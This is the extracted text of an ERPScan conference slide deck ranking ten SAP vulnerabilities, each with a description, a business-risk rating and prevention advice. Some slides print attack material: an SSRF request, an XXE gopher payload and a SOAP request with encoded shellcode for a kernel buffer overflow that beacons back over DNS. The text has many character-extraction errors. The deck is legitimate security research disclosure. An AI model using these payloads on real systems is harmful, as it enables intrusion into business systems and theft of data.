Alexander Polyakov. CTO at ERPScan

Size: px

Start display at page:

Download "Alexander Polyakov. CTO at ERPScan"

Aileen Chandler
6 years ago
Views:

1 Invest in security to secure investments Top 10 most interes.ng SAP vulnerabili.es and a9acks + bonus Alexander Polyakov. CTO at ERPScan 1

ons key security conferences worldwide 25 Awards and nomina.

2 About ERPScan The only 360- degree SAP Security solu8on - ERPScan Security Monitoring Suite for SAP Leader by the number of acknowledgements from SAP ( 150+ ) 60+ presenta.ons key security conferences worldwide 25 Awards and nomina.ons Research team - 20 experts with experience in different areas of security Headquarters in Palo Alto (US) and Amsterdam (EU) 2

3 What is SAP? Shut up And Pay 3

4 Really The most popular business applica8on More than customers 74% of Forbes 500 4

5 Agenda Intro SAP security history SAP on the Internet Top 10 latest interes8ng apacks DEMOs Conclusion 5

6 3 areas of SAP Security 2002 Business logic security (SOD) Prevents a3acks or mistakes made Solu8on: GRC 2008 ABAP Code security Prevents a3acks or mistakes made by developers Solu8on: Code audit 2010 Applica3on pla4orm security Prevents unauthorized access both insiders and remote a3ackers Solu8on: Vulnerability Assessment and Monitoring 6

7 Talks about SAP security Most popular: BlackHat HITB Troopers RSA Source DeepSec etc

8 SAP Security notes By june, 2012, more than 2300 notes

9 SAP vulnerabili.es by type 1 - Directory Traversal 2 - XSS/Unauthorised modifica8on of stored 3 - Missing Auth check 4 - Informa8on Disclosure 5 - Unauthorized usage of applica8on 6 - Hard- coded creden8als 7 - Code injec8on vulnerability 8 - Verb tampering 9 - Remote Code Execu8on 10 - Denial of service 11 - BOF 12 - SQL Inj Stats from : 1Q Q Q

10 Top problems by OWASP- EAS EASAI- 1 Lack of patch management EASAI- 2 Default Passwords for applica8on access EASAI- 3 SOD conflicts EASAI- 4 Unnecessary Enabled Applica8on features EASAI- 5 Open Remote management interfaces EASAI- 6 lack of password lockout/complexity checks EASAI- 7 Insecure op8ons EASAI- 8 Unencrypted communica8ons EASAI- 9 Insecure trust rela8ons EASAI- 10 Guest access 10

11 Top problems by BIZEC BIZEC TEC- 01: Vulnerable Sohware in Use BIZEC TEC- 02: Standard Users with Default Passwords BIZEC TEC- 03: Unsecured SAP Gateway BIZEC TEC- 04: Unsecured SAP/Oracle authen.ca.on BIZEC TEC- 05: Insecure RFC interfaces BIZEC TEC- 06: Insufficient Security Audit Logging BIZEC TEC- 07: Unsecured SAP Message Server BIZEC TEC- 08: Dangerous SAP Web Applica8ons BIZEC TEC- 09: Unprotected Access to Administra8on Services BIZEC TEC- 10: Insecure Network Environment BIZEC TEC- 11: Unencrypted Communica8ons 11

12 Business Risks Espionage Stealing financial informa8on Stealing corporate secrets Stealing suppliers and customers list Stealing HR data Sabotage Denial of service Modifica8on of financial reports Access to technology network (SCADA) by trust rela8ons Fraud False transac8ons Modifica8on of master data e.t.c. 12

13 SAP in the Internet We have collected data about SAP systems in the WEB Have various stats by countries, applica8ons, versions Informa8on from Google, Shodan, Nmap scan Published in SAP Security in figures: a global survey Upda8ng results at sapscan.com MYTH: SAP systems a9acks available only for insiders 13

14 SAP in the Internet (web- services) 2 SAP web services can be found in internet (In Hungary) 14

15 SAP in the Internet (other services) > 5000 non- web SAP services exposed in the world >50 in Hungary Including Dispatcher, Message server, SapHostcontrol,etc 15

16 SAP in the Internet (other services) % of companies that expose different services Hungary World 16

17 Top 10 vulnerabili.es Authen8ca8on Bypass via Verb tampering 2. Authen8ca8on Bypass via the Invoker servlet 3. Buffer overflow in ABAP Kernel 4. Code execu8on via TH_GREP 5. MMC read SESSIONID 6. Remote portscan 7. Encryp8on in SAPGUI 8. BAPI XSS/SMBRELAY 9. XML Blowup DOS 10. GUI Scrip8ng DOS 17

18 10 GUI- Scrip.ng DOS: Descrip.on SAP users can run scripts which automate their user func8ons A script has the same rights in SAP as the user who launched it Security message which is shown to user can be turned off in the registry Almost any user can use SAP Messages (SM02 transac8on) New It is possible to run DOS apack on any user using a simple script Author: Dmitry Chastukhin (ERPScan) 18

19 10 GUI- scrip.ng: Other a9acks Script can be uploaded using: SAPGUI Ac8veX vulnerability Teensy USB flash Any other method of client exploita8on Other a9acks like changing banking accounts in LFBK also possible 19

20 10 GUI- scrip.ng: Business risks Sabotage High Espionage No Fraud No Ease of exploita.on Medium 20

21 Top 10 vulnerabili.es Authen8ca8on Bypass via Verb tampering 2. Authen8ca8on Bypass via the Invoker servlet 3. Buffer overflow in ABAP Kernel 4. Code execu8on via TH_GREP 5. MMC read SESSIONID 6. Remote portscan 7. Encryp8on in SAPGUI 8. BAPI XSS/SMBRELAY 9. XML Blowup DOS 10. GUI Scrip8ng DOS 21

22 10 GUI- scrip.ng: Preven.on SAP GUI Scrip8ng Security Guide Don t ac8vate SAP GUI Scrip8ng if you do not need it sapgui/ user_scrip8ng = FALSE (dafault) Scrip8ng with read only capabili8es use the parameter - sapgui/user_scrip8ng = TRUE - sapgui/user_scrip8ng_set_readonly = TRUE Block registry modifica8on on worksta8ons 22

23 9 XML Blowup DOS: Descrip.on WEBRFC interface can be used to run RFC func8ons By default any user can have access Can execute at least RFC_PING SAP NetWeaver is vulnerable to malformed XML packets It is possible to run DOS apack on server using simple script It is possible to run over the Internet! Author: Alexey Tyurin (ERPScan) 23

24 9 XML Blowup DOS: Business risks Sabotage Cri.cal Espionage No Fraud No Ease of exploita.on Medium 24

25 9 XML Blowup DOS: Preven.on Disable WEBRFC Prevent unauthorized access to WEBRFC using S_ICF Install SAP notes and and

26 8 BAPI script injec.on/hash stealing : Descrip.on SAP BAPI transac8on fails to properly sani8ze input Possible to inject JavaScript code or link to a fake SMB server SAP GUI clients use Windows so their creden8als will be transferred to apackers host. Author: Dmitry Chastukhin (ERPScan) 26

27 8 BAPI script injec.on/hash stealing 27

28 8 BAPI script injec.on: Business risks Espionage High Sabotage High Fraud High Ease of exploita.on Low 28

29 8 BAPI script injec.on: Preven.on Install SAP notes

30 7 SAP GUI bad encryp.on: Descrip.on SAP FrontEnd can save encrypted passwords in shortcuts Shortcuts stored in.sap file This password uses byte- XOR algorithm with secret key Key has the same value for every installa8on of SAP GUI Any password can be decrypted in less than second Author: Alexey Sintsov (ERPScan) 30

31 7 SAP GUI bad encryp.on: Demo 31

32 7 SAP GUI bad encryp.on: Business risks Espionage High Sabotage Medium Fraud High Ease of exploita.on Medium 32

33 7 SAP GUI bad encryp.on: Preven.on Disable password storage in GUI 33

34 6 Remote port scan/ssrf: Descrip.on It is possible to scan internal network from the Internet Authen8ca8on is not required SAP NetWeaver J2EE engine is vulnerable /ipcpricing/ui/bufferoverview.jsp? server= & port=31337 & password= & dispatcher= & targetclient= & view= Author: Alexander Polyakov (ERPScan) 34

35 6 Remote port scan/ssrf: Demo HTTP port Port closed SAP port 35

36 6 Remote port scan/ssrf: Business risks Sabotage Low Espionage Medium Fraud No Ease of exploita.on High 36

37 6 Remote port scan/ssrf: Preven.on Disable unnecessary applica8ons Install SAP notes: , , , ,

38 5 MMC JSESSIONID stealing: Descrip.on Remote management of SAP Playorm By default, many commands go without auth Exploits implemented in Metasploit (by ChrisJohnRiley) Most of the bugs are informa8on disclosure It is possible to find informa8on about JSESSIONID Only if trace is ON 1) Original bug by ChrisJohnRiley 2) JSESSIONID by Alexey Sintsov and Alexey Tyurin (ERPScan) Can be authen.cated as an exis.ng user remotely 38

39 5 MMC JSESSIONID stealing: Business risks Espionage Cri.cal Fraud High Sabotage Medium Ease of exploita.on Medium 39

40 5 MMC JSESSIONID stealing: Preven.on Don t use TRACE_LEVEL = 3 on produc8on systems or delete traces hpp://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe a114084/frameset.htm 40

41 4 RCE in TH_GREP: Descrip.on RCE vulnerability in RFC module TH_GREP Found by Joris van de Vis SAP was not properly patched ( ) We have discovered that the patch can be bypassed in Windows Original bug by Joris van de Vis (erp- sec) Bypass by Alexey Tyurin (ERPScan) 41

42 4 RCE in TH_GREP: Details elseif opsys = 'Windows NT'. concatenate '/c:"' string '"' filename into grep_params in character mode. else. /*if linux*/ /* 185 */ replace all occurrences of '''' in local_string with '''"''"'''. /* 186 */ concatenate '''' local_string '''' filename into grep_params /* 187*/ in character mode. /* 188*/ endif. /* 188*/ 42

43 4 RCE in TH_GREP: Demo #1 43

44 4 - RCE in TH_GREP: More details 4 ways to execute vulnerable program: Using transac8on "Se37 Using transac8on SM51 (thanks to Felix Granados) Using remote RFC call "TH_GREP" Using SOAP RFC call "TH_GREP" via web 44

45 4 RCE in TH_GREP: Demo #2 45

46 4 RCE in TH_GREP: Business risks Espionage High Sabotage Medium Fraud High Ease of exploita.on medium 46

47 4 RFC in TH_GREP: Preven.on Install SAP notes , Prevent access to cri8cal transac8ons and RFC func8ons Check the ABAP code of your Z- transac8ons for similar vulnerabili8es 47

48 3 - ABAP Kernel BOF: Descrip.on Presented by Andreas Wiegenstein at BlackHat EU 2011 Buffer overflow in SAP kernel func8on C_SAPGPARAM When NAME field is more than 108 chars Can be exploited by calling an FM which uses C_SAPGPARAM Example of report RSPO_R_SAPGPARAM Author: (VirtualForge) 48

49 3 ABAP Kernel BOF: Business risks Espionage Cri.cal Sabotage Cri.cal Fraud Cri.cal Ease of exploita.on Medium 49

50 3 ABAP Kernel BOF: Preven.on Install SAP notes: Correc8ng buffer overflow in ABAP system call Poten8al remote code execu8on in SAP Kernel Prevent access to cri8cal transac8ons and RFC func8ons Check the ABAP code of your Z- transac8ons for cri8cal calls 50

51 2 Invoker Servlet: Descrip.on Rapidly calls servlets by their class name Published by SAP in their security guides Possible to call any servlet from the applica8on Even if it is not declared in WEB.XML Can be used for auth bypass 51

52 2 - Invoker Servlet: Details <servlet> <servlet- name>cri8calac8on</servlet- name> <servlet- class>com.sap.admin.cri8cal.ac8on</servlet- class> </servlet> <servlet- mapping> <servlet- name>cri8calac8on</</servlet- name> <url- papern>/admin/cri8cal</url- papern> </servlet- mapping <security- constraint> <web- resource- collec8on> <web- resource- name>restrictedaccess</web- resource- name> <url- papern>/admin/*</url- papern> <hpp- method>get</hpp- method> </web- resource- collec8on> <auth- constraint> <role- name>admin</role- name> </auth- constraint> </security- constraint> Author: Dmitry Chastukhin (ERPScan) What if we call /servlet/com.sap.admin.cri.cal.ac.on 52

53 2 Invoker servlet: Business risks Espionage High Sabotage High Fraud High Ease of use Very easy! 53

54 2 - Invoker servlet: Preven.on Update to the latest patch , EnableInvokerServletGlobally must be false Check all WEB.XML files by ERPScan WEBXML checker 54

55 1 VERB Tampering 55

56 1 st Place Verb Tampering <security- constraint> <web- resource- collec8on> <web- resource- name>restrictedaccess</web- resource- name> <url- papern>/admin/*</url- papern> <hpp- method>get</hpp- method> </web- resource- collec8on> <auth- constraint> <role- name>admin</role- name> </auth- constraint> Author: Alexander Polyakov (ERPScan) </security- constraint> What if we use HEAD instead of GET? 56

57 1 st Place Verb tampering: Details CTC - interface for managing J2EE engine Can be accessed remotely Can run user management ac8ons: Add users Add to groups Run OS commands Start/Stop J2EE Remotely without authen.ca.on! 57

58 1 Verb tampering: More details If patched, can be bypassed by the Invoker servlet! 58

59 1 Verb tampering: Business risks Espionage Cri.cal Sabotage Cri.cal Fraud Cri.cal Ease of use Very easy! 59

60 1 st Place Verb tampering: Preven.on Install SAP notes , Install other SAP notes about Verb Tampering Scan applica8ons by ERPScan WEB.XML checker Disable the applica8ons that are not necessary 60

61 Bonus Track! DilbertMSG web service No I m not kidding Use Soap XML For tes8ng purpose Shipped with SAP PI < 7.1 by default Accessed without authoriza8on Patched just month ago in SAP Security note Epic! 61

62 Bonus track! XXE Tunneling <?xml version="1.0" encoding="iso "?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM gopher:// :3300/ AAAAAAAAA" >]> <foo>&date;</foo> What will happen?? 62

63 XXE Tunneling details Server A (Portal or XI) POST /XISOAPAdapter/servlet/ com.sap.aii.af.mp.soap.web.dilbertmsg?format=post HTTP/1.1 Host: :8000 <?xml version="1.0" encoding="iso "?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM gopher:// :3300/ AAAAAAAAA" >]> <foo>&date;</foo> AAAAAAAA A Server B (ERP, HR, BW etc.) Port 3300 telnet

64 XXE Tunneling to Buffer Overflow (step 1) A buffer overflow vulnerability found by Virtual Forge in ABAP Kernel (fixed in SAP note ) Hard to exploit because it requires calling an RFC func8on which calls Kernel func8on We exploit it via WEBRFC Can be fixed by SAP notes: , , , According to our report, WEBRFC is installed in 40% of NetWeaver ABAP, even on the Internet 64

65 XXE Tunneling to Buffer Overflow (step 2) Shellcode size is limited to 255 bytes (name parameter) As we don t have direct connec8on to the Internet from the vulnerable system, we want to use DNS tunneling shellcode to connect back But the XML engine saves some XML data in RWX memory (XML Spraying) So we can use egghunter Any shellcode can be uploaded 65

66 XXE Tunneling to Buffer Overflow (Step 3) POST /sap/bc/soap/rfc?sap- client=000 HTTP/1.1 Authoriza8on: Basic U1FQKjowMjA3NTk3== Host: company.com:80 User- Agent: ERPSCAN Pentes8ng tool v 0.2 Content- Type: text/xml; charset=uy- 8 Cookie: sap- client=000 Content- Length: 2271 <SOAP- ENV:Envelope xmlns:soap- ENV="hPp://schemas.xmlsoap.org/soap/envelope/" xmlns:soap- ENC="hPp://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="hpp:// instance" xmlns:xsd="hpp:// ENV:Body><m:RSPO_R_SAPGPARAM xmlns:m="urn:sap- com:document:sap:rfc:func8ons"><heap_egg>dsecdsechff 4diFkDwj02Dwk0D7AuEE4y4O3f2s3a064M7n2M0e0P2N5k054N4r4n0G4z3c4M3O4o8M4q 0F O1n7L3m0Z0O0J4l8O0j0y7L5m3E2r0b0m0E1O4w0Z3z3B4Z0r2H3b3G7m8n0p3B1N1m4Q8P4s2K4W4C8L3v3U3h5O0t3B3h3i3Z7k0a0q3D0F0p 4k2H3l0n3h5L0u7k3P2p N0a3q1K8L4Q2m1O0D8K3R0H2v0c8m5p2t5o4z0K3r7o0S4s0s3y4y3Z5p0Y5K0c053q5M0h3q4t3B0d0D3n4N0G3p082L4s 1K5o3q012s4z2H0y1k4C0B153X3j0G4n2J0X0W7o3K2Z260j2N4j0x2q2H4S0w030g323h3i127N165n3Z0W4N390Y2q4z4o2o3r0U3t2o0a3p4o3T0x4k315N3i 0I3q164I0Q0p8O3A07040M0A3u4P3A7p3B2t058n3Q02VTX10X41PZ41H4A4K1TG91TGFVTZ32PZNBFZDWE02DWF0D71DJE5I4N3V M2Z6M1R112 NOK066N5G4Z0C5J425J3N8N8M5AML4D17015OKN7M3X0Z1K0J388N0Z1N0MOL3B621S1Q1T1O5GKK3JJO4P1E0X423GMMNO6P3B141M4Q3A5C7N4W4 C8M9R3U485HK03B49499J2Z0V1F3EML0QJK2O482N494M1D173Q N7J401K9L9X101O0N3Z450J161T5M90649U4ZMM3S9Y1C5C1C9Y3S3Z300 Y5K1X2D9P4M6M9T5D3B1T0D9N4O0M3T082L5D2KOO9V0J0W5J2H1N7Z4D62LO3H9O1FJN7M0Y1PMO3J0G2I1ZLO3D0X612O4T2C010G O074 X4V0W4O5Z68615JJOLO9R0T9ULO1V8K384E1HJK305N44KP9RKK4I0Q6P3U3J2F032J0A9W4S4Q2A9U69659R4A06aaaaaaaaaaaaaaaaaaaaa</ HEAP_EGG><NAME>ºÿÿÎ<fÊÿBRjCXÍ.<& #005;Ztï dsecú uê uçÿç& #144;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¾«DSEC^ ü1+ôsò:gú/9lÿt â_@a}Xs quú ERYëëÆÿÿé MÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</ NAME></m:RSPO_R_SAPGPARAM></SOAP- ENV:Body></SOAP- ENV:Envelope> 66

67 XXE Tunneling to Buffer Overflow (Step 4) Next step is to pack this packet B into Packet A We need to insert non- printable symbols God bless gopher; it supports urlencode like HTTP It will also help us evade apack against IDS systems Packet A POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1 Host: sapserver.com:80 Content- Length: 7730 <?xml version="1.0" encoding="iso "?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM gopher://[urlencoded Packet B]" >]> <foo>&date;</foo> 67

XXE Tunneling to Buffer Overflow: Final step POST /XISOAPAdapter/servlet/ com.sap.aii.af.mp.soap.web.dilbertmsg? format=post HTTP/1.1 Host: sapserver.com:80 Server A on the Internet (SAP XI) <?

68 XXE Tunneling to Buffer Overflow: Final step POST /XISOAPAdapter/servlet/ com.sap.aii.af.mp.soap.web.dilbertmsg? format=post HTTP/1.1 Host: sapserver.com:80 Server A on the Internet (SAP XI) <?xml version="1.0" encoding="iso "?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM gopher:// [packetb]" >]> <foo>&date;</foo> Packet B Server B in DMZ (SAP ERP) hpp://company.com Port 8000 WebRFC service Packet C Command and Control response to a9acker by DNS protocol which is allowed for outband connec.ons Shellcode service with DNS payload 68

69 Full control over the internal system through the Internet 69

70 Conclusion It is possible to be protected from almost all those kinds of issues and we are working hard with SAP to make it secure SAP Guides Regular Security assessments Monitoring technical security ABAP Code review Segrega.on of Du.es It s all in your hands 70

71 Future work Many of the researched things cannot be disclosed now because of our good reladonship with SAP Security Response Team, whom I would like to thank for cooperadon. However, if you want to see new demos and 0- days, follow us and a3end the future presentadons: 16 October - IT Security Expo (Germany,Nurnberg) 30 October - HackerHalted (USA,Miami) 2-3 November - HashDays (Switzerland,Lucerne) 8-9 November - POC In Korea (Korea,Seul) 20 November ZeroNights (Russia,Moscow) 29 November- DeepSEC (Austria,Vienna) 71

72 Greetz to our crew who helped: Dmitriy Evdokimov, Alexey Sintsov, Alexey Tyurin, Pavel Kuzmin, Evgeniy Neelov. 72

EAS- SEC: Framework for Securing Enterprise Business Applica;ons

Invest in security to secure investments EAS- SEC: Framework for Securing Enterprise Business Applica;ons Alexander Polyakov CTO ERPScan About ERPScan The only 360- degree SAP Security solu8on - ERPScan